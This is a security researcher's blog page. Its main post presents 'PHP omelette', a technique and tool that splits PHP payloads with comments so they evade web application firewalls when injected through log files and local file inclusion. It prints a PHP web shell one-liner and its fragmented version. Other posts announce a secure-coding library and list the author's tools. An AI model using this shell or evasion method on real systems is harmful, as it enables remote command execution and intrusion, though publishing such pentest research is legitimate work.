Just Another Hacker
Author's avatar

PHP omelette, code fragmentation for scripting languages

Code fragmentation is not exactly a new technique, when dealing with binary exploitation, techniques like egg hunter and omelette refers to various ways to bootstrap a larger payload from a smaller one. However when I needed to bypass a modern WAF on a pentest where I could inject a user controlled value into a log file which could then be executed via LFI I came up with this technique to fragment the payload in a way that it is fragmented, but still executes as if it was consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented javascript I though the time was right for releasing it now.

Concept

The broad concept is:

  1. Everything inside the <?php ?> tags is code
  2. Everything inside the /* */ multi line comments are ignored
  3. PHP parsing has some flexibility

The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.

The steps are simple enough that they can be performed manually:

  1. Add comment after all opening tags
  2. Add comment before all closing tags
  3. Add comments before and after semi colons
  4. Add comment after comma
  5. Add comments before and after opening and closing pharanteses
  6. Remove duplicate comments
  7. Insert new line before each closing multi line comment
  8. Remove empty lines
  ./omelette '<?=passthru($_GET[cmd]);?>'
            
                     _            _   _         _            _             _          _          _            _
                    /\ \         /\_\/\_\ _    /\ \         _\ \          /\ \       /\ \       /\ \         /\ \
                   /  \ \       / / / / //\_\ /  \ \       /\__ \        /  \ \      \_\ \      \_\ \       /  \ \
                  / /\ \ \     /\ \/ \ \/ / // /\ \ \     / /_ \_\      / /\ \ \     /\__ \     /\__ \     / /\ \ \
                 / / /\ \ \   /  \____\__/ // / /\ \_\   / / /\/_/     / / /\ \_\   / /_ \ \   / /_ \ \   / / /\ \_\
                / / /  \ \_\ / /\/________// /_/_ \/_/  / / /         / /_/_ \/_/  / / /\ \ \ / / /\ \ \ / /_/_ \/_/
               / / /   / / // / /\/_// / // /____/\    / / /         / /____/\    / / /  \/_// / /  \/_// /____/\
              / / /   / / // / /    / / // /\____\/   / / / ____    / /\____\/   / / /      / / /      / /\____\/
             / / /___/ / // / /    / / // / /______  / /_/_/ ___/\ / / /______  / / /      / / /      / / /______
            / / /____\/ / \/_/    / / // / /_______\/_______/\__\// / /_______\/_/ /      /_/ /      / / /_______\
            \/_________/          \/_/ \/__________/\_______\/    \/__________/\_\/       \_\/       \/__________/
            
            ============================================================================[justanotherhacker.com]===
            <?= /*
            */passthru/*
            */(/*
            */$_GET[cmd]/*
            */)/*
            */;/*
            */?>

Or if fragmenting code from a file:

./omelette "$(cat t/shell3.php)" > plate

The various scripts to fragment and inject the code can be found at: https://github.com/wireghoul/php-omelette. While aimed at PHP the generic methods outlined above can be applied to many languages, including javascript, C/C++ and others.

Author's avatar

Announcing safelity

Safelity is a proof of concept PHP library for secure coding. It was released on github a while ago, but formally introduced as part of my presentation “Codified security”, presented at GIDS today. It differs from traditional secure coding concepts in that it aims to make safe code visually identifiable when reading and writing code. But also make it hard to use in an unsafe manner and allow easy auditing of code written with the library. Unfortunately it is a limited functionality library, but I think it illustrates that you can make secure coding about writing secure code as opposed to trying to turn great developers into security experts.

This is predominantly inspired by Joel on software’s post about making wrong code look wrong https://www.joelonsoftware.com/2005/05/11/making-wrong-code-look-wrong/ and the clever engineering that makes parameterized queries/prepared statements very secure and simple to use.

You can find the code on https://github.com/wireghoul/safelity, the talk is being recorded, but may only be available on the conference website.

Author's avatar

The new new

It’s been a while since the last revamp, but I decided to renovate the blog. All of the old content has been moved to http://archive.justanotherhacker.com. I stuck with the notion of a static site generator, and wrote my own with a little inspiration from Bashyll and Roman Zolotarev’s ssg. The design is based on PureCSS, a CSS grid layout system similar to bootstrap without the need for JavaScript.

There are a few upcoming project releases so check back soon!

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!